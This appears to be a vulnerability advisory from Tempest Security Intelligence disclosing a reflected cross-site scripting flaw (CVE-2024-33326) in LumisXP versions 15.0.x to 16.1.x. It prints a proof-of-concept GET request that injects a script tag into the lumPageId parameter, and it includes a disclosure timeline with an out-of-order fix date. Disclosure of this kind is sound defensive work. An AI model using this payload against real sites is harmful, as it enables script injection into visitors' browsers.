LumisXP 16.1.x Cross Site Scripting

2024.07.11
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

=====[ Tempest Security Intelligence - ADV-6/2024 ]========================== LumisXP v15.0.x to v16.1.x Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability Information]============================================= * Class: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ('Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')') [CWE-79] * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4 =====[ Overview]======================================================== * System affected : LumisXP * Software Version : Version - v15.0.x to v16.1.x * Impacts : * Vulnerability: A cross-site scripting (XSS) vulnerability in the component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the lumPageID parameter =====[ Detailed description]================================================= * XSS [GET /portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=]: 1 - Send the link by inserting the XSS payload into the lumPageID= parameter. ``` GET /portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath= ``` 2 - Verify that in the response your payload will be executed. =====[ Timeline of disclosure]=============================================== 2/Apr/2024 - Responsible disclosure was initiated with the vendor. 12/Apr/2024 - LumisXP Support confirmed the issue; 16/Fev/2024 - The vendor fixed the vulnerability 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33326 =====[ Thanks & Acknowledgements]======================================== * Tempest Security Intelligence [1] * Rodolfo Tavares * Niklas Correa =====[ References ]===================================================== [1][ [https://cwe.mitre.org/data/definitions/79.html] [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]] [3][Thanks Filipe X.] =====[ EOF ]=========================================================== -- -- *Esta mensagem é para uso exclusivo de seu destinatário e pode conter informações privilegiadas e confidenciais. Todas as informações aqui contidas devem ser tratadas como confidenciais e não devem ser divulgadas a terceiros sem o prévio consentimento por escrito da Tempest. Se você não é o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste caso, por favor, notifique o remetente da mesma e destrua imediatamente a mensagem.* * * *This message is intended solely for the use of its addressee and may contain privileged or confidential information. All information contained herein shall be treated as confidential and shall not be disclosed to any third party without Tempest’s prior written approval. If you are not the addressee you should not distribute, copy or file this message. In this case, please notify the sender and destroy its contents immediately.** * * *


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top